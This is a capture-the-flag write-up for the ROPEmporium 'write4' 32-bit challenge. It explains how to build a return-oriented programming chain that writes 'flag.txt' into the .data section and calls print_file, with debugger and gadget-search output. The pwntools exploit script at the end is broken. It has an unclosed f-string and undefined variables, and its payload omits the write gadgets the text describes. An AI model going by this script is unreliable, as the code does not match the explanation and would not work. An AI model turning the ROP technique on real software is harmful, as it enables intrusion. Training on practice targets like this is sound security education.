Writeup of write four [write4] on ROPEmporium

Prerequisites: Basic knowledge of assembly, disassembling tools, the previous challenges, and calling convention

We’re told the following: “A PLT entry for a function named print_file() exists within the challenge binary, simply call it with the name of a file you wish to read (like ‘flag.txt’) as the 1st argument. The ‘flag.txt’ isn’t present in the binary”

We need a writeable part of memory, because we need to write the string into the binary.

0x080483f0]> iS

nth paddr        size vaddr       vsize perm name

24  0x00001018    0x8 0x0804a018    0x8 -rw- .data

[Other sections have been removed due to easier readability]

We’re going to write out flag into this section. The section has a size of 8, which is perfect for our payload of 8 characters. Originally I used a different section with a larger size, this caused the string not to be null-terminated, and therefore the payload didn’t work.

Now how are we going to write to this section? That’s our next problem. We’ll need to use a “write/what/where” gadget, such as: mov [reg], reg The gadget moves the value of reg, into the address pointed to by reg. This is what the [] brackets are for.

We can open the binary with gdb, and look at the usefulGadgets function (addr found with info func)

pwndbg> disass usefulGadgets 
Dump of assembler code for function usefulGadgets:
   0x08048543 <+0>: mov    DWORD PTR [edi],ebp
   0x08048545 <+2>: ret    

We have a gadget that moves the value from ebp into the address pointed to by edi. Now we need a gadget, that can control the values in the edi and ebp registers. If we remember the crucial basic instruction “pop”, this is a way of setting a registers value. (It does also increment the stackpointer, but we don’t care about that right now)

cave@noobpwn:~/binexp/ROP-emperium/write4_32$ ROPgadget --binary write432 | grep pop

0x080485aa : pop edi ; pop ebp ; ret

[Other results removed for readability]

Great! So we have a gadget to set the registers. Now we’ll need to put together the ropchain.

pop_edi_pop_ebp + datasegm + b"flag"

pop_edi_pop_ebp + datasegm+0x4 + b".txt"

print_file + datasegm

It’s important to remember that the gadget works as a: mov destination, source

The reason for our +0x4, is that we can only have 4 bytes in an address at once. 1 address is equal to 32 bit, which is the same as 4 bytes.

Now we just need the print_file call, where we need this datasegm (beginning) to be the argument! And flag!:)


from pwn import *



mov=p32(0x08048543) #mov [edi], ebp
pop=p32(0x080485aa) #pop edi; pop ebp

gdbscript= f"""

terminalSetting = ['gnome-terminal', '-e']

io = pwnlib.gdb.debug(elfPath, gdbscript = gdbscript)

mnm = cyclic_gen()
mnm = mnm.get(80)
point=cyclic_find(b"laaa", endian="little")
#6161616c is at the return or laaa

def main():
    print(io.recvuntil("> "))
    payload=b"A"*point #padding
    payload+=print_file+p32(datasegm) #Call print_file with the memory as argument

